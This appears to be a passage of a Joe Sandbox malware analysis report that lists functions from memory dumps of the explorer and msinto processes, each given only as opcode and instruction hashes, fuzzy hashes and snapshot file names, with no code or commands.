                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 425573b90a43cad5d575e2db20d710bbe9de4a4569508135f7e6960e682500ba
                                                            • Instruction ID: 43e66950ca220149baa6d8d87797d03d5263cde3e62a47175ba0f86433dfc399
                                                            • Opcode Fuzzy Hash: 425573b90a43cad5d575e2db20d710bbe9de4a4569508135f7e6960e682500ba
                                                            • Instruction Fuzzy Hash: E5018F35E0E7899FEB12DB6888E409DBFB0EF13304F1441F6D144DB292DA3C6A459781
                                                            Function 00007FFD34894635 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction ID: e95fb290c2b3b928a870c731c654ff6e8fa48352e35bb24f335e7ba38db2fd27
                                                            • Opcode Fuzzy Hash: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction Fuzzy Hash: 07F0EC30A1DA1E8EFB95EB40C8E47F87761FB96701F5001B5D60ED72A1DF2C69809A40
                                                            Function 00007FFD348945BC Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction ID: 7ad49011195757d587278f6c6289c0a42a4b6b7a0b063a2074315394920dfd7e
                                                            • Opcode Fuzzy Hash: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction Fuzzy Hash: 56F05E31B0CA0A4EFBD5EB40C8E46F82791FF57700F500175DA4ED72A2DE2C69409640
                                                            Function 00007FFD348906F2 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf54574ddcc50799ea5c6ca5731293c98964cc92c99a0dd42eeded35e66fb0ef
                                                            • Instruction ID: 3924769124aa56186fbb7a94feb08c50c7a60ac895fd417b4e2291277dd59482
                                                            • Opcode Fuzzy Hash: cf54574ddcc50799ea5c6ca5731293c98964cc92c99a0dd42eeded35e66fb0ef
                                                            • Instruction Fuzzy Hash: 92E08051D4EB4A06E503337D15F609D7E541F93314F9800B3D64DD7193B98D30992656
                                                            Function 00007FFD34892E4C Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction ID: 2f312bef2545f5762811169aa98410ad3a038a2bc46bb17f3302d804b9a5e04d
                                                            • Opcode Fuzzy Hash: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction Fuzzy Hash: 08E04F61F0D80687FB94A744D8A0BB977A5EF8A310F140078EB5EE33C1CD2CAD409B06
                                                            Function 00007FFD3489F1C8 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 328f2719d672d29b5b68c311e6b4c6e7d26fcaa1a2469217ebe8a8a5fa804afd
                                                            • Instruction ID: f2ee92de5936beaaf1f060bc0344eb673db1e7f06884b602d7ae2ddb3a7d556c
                                                            • Opcode Fuzzy Hash: 328f2719d672d29b5b68c311e6b4c6e7d26fcaa1a2469217ebe8a8a5fa804afd
                                                            • Instruction Fuzzy Hash: 55D05E346249084FCB48EF39C89E535B3D1FB99206F99C1BA944ED7660CFA998815781
                                                            Function 00007FFD34890B95 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction ID: 8f79dd9408f26d11c42a898f10d6707ffc110a62e6fd2c8c1cdad3cf97f20dbb
                                                            • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction Fuzzy Hash: 4BD0A930228A4E8FDA00B738C88A8247FA0FF0F211FC910E1E00CC71A2D60888A98700
                                                            Function 00007FFD348906A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction ID: 95b1d848adf6667cc5db12a6453be83fbbc4c16dd8dda3b53f8c0f05bf2344a2
                                                            • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction Fuzzy Hash: CBC04C06F5AE1F41B817776E58E60ACA9406FD7610FD50172D74DD00D59D4D20D52156
                                                            Function 00007FFD348912B0 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction ID: be7e1216d74ff13bb867579444f3699e1c28af47cdf1a3e8583d3aa304f7f1a0
                                                            • Opcode Fuzzy Hash: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction Fuzzy Hash: 4AC08C30520C088FC908EB28C88480437A0FB0A300BC100D0E408C7170D22ADCC1D780
                                                            Function 00007FFD34894C37 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c903e4df3390a1e18134e24db329a88d411c7b635317d015d9673dfc96d6a6fe
                                                            • Instruction ID: 8004f8a91d328b6a2a61799d88d1a757c6019789dc41e33cd7e8d293e1e928ee
                                                            • Opcode Fuzzy Hash: c903e4df3390a1e18134e24db329a88d411c7b635317d015d9673dfc96d6a6fe
                                                            • Instruction Fuzzy Hash: 1AC04C05F1CC1646F2A6629444717BD08475F84705F554574E11DE73C7CD6D6D1112C6
                                                            Function 00007FFD348906C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction ID: 540971fc12ec527759304d3a8d2483f542ce6b9649b29f8a79a8795672789fc3
                                                            • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction Fuzzy Hash: 24B01200E56C0F00A405337E08D206478406B47100FC000B0EA0DC0085984D20942242
                                                            Function 00007FFD34891FF7 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction ID: b1dd163ebb3e39676d85ea11c6808265ee030b6acf7a1a8a5b3e8586dbb523ad
                                                            • Opcode Fuzzy Hash: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction Fuzzy Hash: 7AC02232F0C80C80FB28833088A20FA32028F83308F0A82F2820AFB082CC3C28003200

                                                            Non-executed Functions

                                                            Function 00007FFD348909B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 47c0b60897939649b7ce00a7661d9a86acd0d648304fcb3773cd270617ccc05b
                                                            • Instruction ID: df3666a5f515ab4fd6cda93ba273e0528202ce79129233bb897f30a79834c4ac
                                                            • Opcode Fuzzy Hash: 47c0b60897939649b7ce00a7661d9a86acd0d648304fcb3773cd270617ccc05b
                                                            • Instruction Fuzzy Hash: 30416D07F085636AE12133FD71711EE6BA89F82339B0C5677E14CDA183ADB874C582E5

                                                            Executed Functions

                                                            Function 00007FFD348C0D4C Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5X_H
                                                            • API String ID: 0-3241812158
                                                            • Opcode ID: d79c0f224389b0ab7f410dee735e32a166356afc1d448d5ecb534662f8b75df3
                                                            • Instruction ID: 486be29d7c490e42e983c1ed7d536c8c0f862da44f66da9346211630a44b765e
                                                            • Opcode Fuzzy Hash: d79c0f224389b0ab7f410dee735e32a166356afc1d448d5ecb534662f8b75df3
                                                            • Instruction Fuzzy Hash: 4C91D4B5A18B894FEB59DF9888753A9BFE1FF56350F0401BBD049D72D6CA7928118340
                                                            Function 00007FFD348C07D0 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HA{4
                                                            • API String ID: 0-3821214897
                                                            • Opcode ID: c2aeab0a1f9c9cd804638696aeeb878071689e4ab91bd45ae1f86dd0b3b8c829
                                                            • Instruction ID: 51be4b2f64b465602ce5a557e69fdcada055ff9e29d7bd05cd27e7ad02aa097b
                                                            • Opcode Fuzzy Hash: c2aeab0a1f9c9cd804638696aeeb878071689e4ab91bd45ae1f86dd0b3b8c829
                                                            • Instruction Fuzzy Hash: E4312621A0D6890FE7569B3888B55E97FB0EF87300F0941F7D549C71E3D92C6D068791
                                                            Function 00007FFD348C08D0 Relevance: .2, Instructions: 155COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6408b7c12793b9e8926a6b280a8e4f35fc46a58a14f39f15106e7423261232a4
                                                            • Instruction ID: be28e761272728622573a7c44091c60110f496fbf5ec415ecaed63dfaf8923e5
                                                            • Opcode Fuzzy Hash: 6408b7c12793b9e8926a6b280a8e4f35fc46a58a14f39f15106e7423261232a4
                                                            • Instruction Fuzzy Hash: FD41E222B0C6655BE715B7FC60FA2FAB795EF86321B0805BBE10DC7197DD28AC418284
                                                            Function 00007FFD348C090D Relevance: .1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3a8baf7a894fd699f205bccb4c2ac3e488f34775619b2de24466ec5254a1b32
                                                            • Instruction ID: 42b2600c68a4a30585b956dcfd20e87d6a5678a733d2a0f76817f2587b219b55
                                                            • Opcode Fuzzy Hash: c3a8baf7a894fd699f205bccb4c2ac3e488f34775619b2de24466ec5254a1b32
                                                            • Instruction Fuzzy Hash: F1411622B0C6151FE718B7FC60EA6F9B795DF85321F08057BE10DD71A7DD28AC418284
                                                            Function 00007FFD348C0908 Relevance: .1, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction ID: 86609d9534ee5fa566f28cb40098723679f38f520b7be835cb150e48c293f510
                                                            • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction Fuzzy Hash: E421B93130C8184FD768EB1CE989DB577D1EF5532171501BAE58EC7126E915EC4287C1
                                                            Function 00007FFD348C4525 Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5c51353530ac7bdfdefd47e009866b505001a561bb319090d3436feb1c182fc2
                                                            • Instruction ID: ee4c1ff67fecebceb42d637882318d91f8c10704815b6d1ecc03e1b11bbcaf01
                                                            • Opcode Fuzzy Hash: 5c51353530ac7bdfdefd47e009866b505001a561bb319090d3436feb1c182fc2
                                                            • Instruction Fuzzy Hash: 24310320F089194FFB95EB5485A57B9B291FF5B740F5001B7D64FD7292DE2CAC809701
                                                            Function 00007FFD348C116D Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 844ffc05f37f674a5f8f9d1ed2633a0d2e94b14919343d6b979e5c20b946d6b0
                                                            • Instruction ID: 42ec9d0bbf9dace3a2f5e9338c19fe695e0b462994db4f39fe9bdf46ac84431d
                                                            • Opcode Fuzzy Hash: 844ffc05f37f674a5f8f9d1ed2633a0d2e94b14919343d6b979e5c20b946d6b0
                                                            • Instruction Fuzzy Hash: 0E318231A0C64A8FDB45EB68C8A5AA9BBF0FF5A300F0545BBD009D7193DA2DA945CB40
                                                            Function 00007FFD348C0998 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4631890d9bd400d2da4a4a678a2ba9ab15b379a0b679e4d64f02a63e96ce1e9a
                                                            • Instruction ID: cef75de952023bb2f4d252422f1b4cd62f35ef75e31cd46aef2fe6910b28e885
                                                            • Opcode Fuzzy Hash: 4631890d9bd400d2da4a4a678a2ba9ab15b379a0b679e4d64f02a63e96ce1e9a
                                                            • Instruction Fuzzy Hash: 5621F920B18A294FFB98A76C54EA7B9F6C2EF99311F50007AE50DC33D3DD28AC418285
                                                            Function 00007FFD348C0C25 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 58ac8bfa442631d802b156f9f8ace731cce90e316a8680dc2225fbc232fea72e
                                                            • Instruction ID: 38170b9b917a61fc46e31c2b0c46912dd8daa05c86e9d660e4aa947e29a27238
                                                            • Opcode Fuzzy Hash: 58ac8bfa442631d802b156f9f8ace731cce90e316a8680dc2225fbc232fea72e
                                                            • Instruction Fuzzy Hash: A621E536F0D6599BE712ABFC99A10EDBB60EF43360F1441B3D148DB183E93C69469781
                                                            Function 00007FFD348C0C38 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6876dba628be8998f882f24abafface258882c859d69796fadb0cdeaa59dd06
                                                            • Instruction ID: 88b04005649146838f70299e3923ad62d7b2276274629ddca6ee1d886337577e
                                                            • Opcode Fuzzy Hash: f6876dba628be8998f882f24abafface258882c859d69796fadb0cdeaa59dd06
                                                            • Instruction Fuzzy Hash: 9811C235F0D6898FE712DBA88AA11EDBBB0EF53390F1440B7C144DB192D93C6A469781
                                                            Function 00007FFD348C5721 Relevance: .1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf57b9809476c427d9eb4170aa5f8f52a39f2baf267587ec69ce446c8c987781
                                                            • Instruction ID: acc06ec136bcb3b406aa124701827c020d52e26406c8d6da581eb455f7bb5903
                                                            • Opcode Fuzzy Hash: cf57b9809476c427d9eb4170aa5f8f52a39f2baf267587ec69ce446c8c987781
                                                            • Instruction Fuzzy Hash: 8C112B30A48A19CFDF98DB04C494BA9B7E2EB68314F15416AC00ED7290CB39ADC0DF04
                                                            Function 00007FFD348C0C40 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4af3da11d526ab4f6765afafd2ca35ae3413b175ffa61197f60295c7a7f66345
                                                            • Instruction ID: 4392658871d994451d5a93ecebdb4768d7d1e005cb76766b12200625d06f9813
                                                            • Opcode Fuzzy Hash: 4af3da11d526ab4f6765afafd2ca35ae3413b175ffa61197f60295c7a7f66345
                                                            • Instruction Fuzzy Hash: B611C435F0D2898FE712DBA889A11EDBBB0EF53350F1441B7D144DB192D93C6A459781
                                                            Function 00007FFD348C0C50 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 85f9a42d9209773edc11f854719ecb777ebdf7386f0dfdfeeaad5ac97c8b3475
                                                            • Instruction ID: a0f8aaa48a08f6cc670abdebf71558080d9ec34a074afaba0587ad2e39cd4223
                                                            • Opcode Fuzzy Hash: 85f9a42d9209773edc11f854719ecb777ebdf7386f0dfdfeeaad5ac97c8b3475
                                                            • Instruction Fuzzy Hash: 0B018F34E0E3899FEB12DBA889A01ADBFB0EF13350F1441F7D144DB182DA3C6A459781
                                                            Function 00007FFD348C4635 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction ID: 5a12d1a3140f813f20ca191d0cebbd260fdbf8cae363bb804f2afe8e5f0959ce
                                                            • Opcode Fuzzy Hash: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction Fuzzy Hash: 64F03C30A1861E8FFB14EB40C9E4BF8B361FB96341F1041B6C60AD72A5DF3C6D809A40
                                                            Function 00007FFD348C45BC Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction ID: eb807824a59c9c517a71902e899d37c0a05eff17399d5afcc6d6ed113d872aaa
                                                            • Opcode Fuzzy Hash: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction Fuzzy Hash: 1BF03A20B0860A4FFB90EB4089E4AF8B391BF57740F104176DA4AD72A2DE2C6D809640
                                                            Function 00007FFD348C06F2 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9ddc3fee58b07b2687ca37ed0bd7eeef19bed29c54f4b5df6d8e46aeaf8f1149
                                                            • Instruction ID: 7339a8c2172658784c4272b424c05367c83c3a674650b696d7ba4f58a742b777
                                                            • Opcode Fuzzy Hash: 9ddc3fee58b07b2687ca37ed0bd7eeef19bed29c54f4b5df6d8e46aeaf8f1149
                                                            • Instruction Fuzzy Hash: 33E02051D4E74606E50337FD16F249DFA141F93254F9800B3D64DD7093B88D349C2652
                                                            Function 00007FFD348C2E4C Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction ID: 340c29546dd859ea3bed8d733efef49a8d0744311bc96971c18b5a88a29b0509
                                                            • Opcode Fuzzy Hash: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction Fuzzy Hash: 29E01260F0900646FB94A744D5E0BA9A355DB49310F140079DB4ED33C1CD2CAD44AB05
                                                            Function 00007FFD348CF1C8 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.3043410670.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_7ffd348c0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 328f2719d672d29b5b68c311e6b4c6e7d26fcaa1a2469217ebe8a8a5fa804afd
                                                            • Instruction ID: 8a99bb603c38fe1ac17b8cb8e700948266bf722a280e4c2bb5b5dd1010fe8e79
                                                            • Opcode Fuzzy Hash: 328f2719d672d29b5b68c311e6b4c6e7d26fcaa1a2469217ebe8a8a5fa804afd
                                                            • Instruction Fuzzy Hash: 7DD05E346249088BCB0CEF39C88E535B3D1FB99206F99C1BA944ED6660CFA998815741
